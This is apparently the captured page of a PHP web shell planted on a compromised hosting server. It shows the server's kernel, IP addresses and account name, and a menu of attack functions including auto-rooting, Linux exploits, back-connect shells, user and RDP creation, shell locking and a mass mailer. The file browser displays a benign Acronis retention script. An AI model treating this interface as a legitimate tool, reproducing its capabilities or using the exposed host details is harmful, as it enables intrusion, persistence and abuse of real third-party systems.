Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
lib /
Acronis /
PyTools /
commands /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
__pycache__
[ DIR ]
drwxrwxr-x
auto_update.py
2.84
KB
-rw-r--r--
protect.py
408
B
-rw-r--r--
retention.py
9.64
KB
-rw-r--r--
retention_specs.py
1.25
KB
-rw-r--r--
run_tool.py
817
B
-rw-r--r--
staging.py
732
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : retention_specs.py
import time SECONDS_IN_DAY = 86400 ACTIVITY_COMPLETED_STATE = 5 def get_days_before_time(days): return int(time.time()) - SECONDS_IN_DAY * days def completed_activities_by_amount(amount, days): return { 'pattern': [ ('^Is', 'string', 'Tol::History::Plain::Activity'), ('.State', 'dword', ACTIVITY_COMPLETED_STATE), ('.Period.FinishTime', 'sqword', 0), ('.Period.FinishTime^Less', 'sqword', get_days_before_time(days)), ], 'historical_order': True, 'objects_count_limit': amount, } def completed_activities_by_age_in_days(days): return { 'pattern': [ ('^Is', 'string', 'Tol::History::Plain::Activity'), ('.State', 'dword', ACTIVITY_COMPLETED_STATE), ('.Period.FinishTime', 'sqword', 0), ('.Period.FinishTime^Less', 'sqword', get_days_before_time(days)), ], 'historical_order': True, 'objects_count_limit': 0, } RETENTION_SPECS_CLOUD = [ completed_activities_by_age_in_days(60), completed_activities_by_amount(10000, 7) ] RETENTION_SPECS_ONPREM = [ completed_activities_by_age_in_days(60), completed_activities_by_amount(10000, 7) ]
Close